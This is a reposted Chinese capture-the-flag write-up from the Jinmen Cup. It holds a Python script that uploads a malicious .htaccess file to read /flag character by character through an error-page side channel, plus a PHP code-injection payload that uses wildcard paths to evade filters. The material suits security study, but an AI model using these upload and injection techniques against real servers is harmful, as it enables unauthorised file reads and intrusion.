NU1L-wp学习-津门杯
Posted MuRKuo
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了NU1L-wp学习-津门杯相关的知识,希望对你有一定的参考价值。
UploadHub
import requests
import string
import hashlib
ip = requests.get(\'http://118.24.185.108/ip.php\').text
print(ip)
def check(a):
f = \'\'\'
<If "file(\'/flag\')=~ /\'\'\'+a+\'\'\'/">
ErrorDocument 404 "wupco"
</If>
resp = requests.post("http://122.112.248.222:20003/index.php?id=167",
data={\'submit\': \'submit\'}, files={\'file\': (\'.htaccess\',f)} )
a = requests.get("http://122.112.248.222:20003/upload/"+ip+"/a").text
if "wupco" not in a:
return False
else:
return True
flag = "flag{BN"
c = string.ascii_letters + string.digits + "\\{\\}"
for j in range(32):
for i in c:
print("checking: "+ flag+i)
if check(flag+i):
flag = flag+i
print(flag)
break
else:
continue
payload
http://122.112.214.101:20004/?code=?><?=
/???/???%20/????;
以上是关于NU1L-wp学习-津门杯的主要内容,如果未能解决你的问题,请参考以下文章
[网络安全提高篇] 一〇九.津门杯CTF的Web Write-Up万字详解(SSRF文件上传SQL注入代码审计中国蚁剑)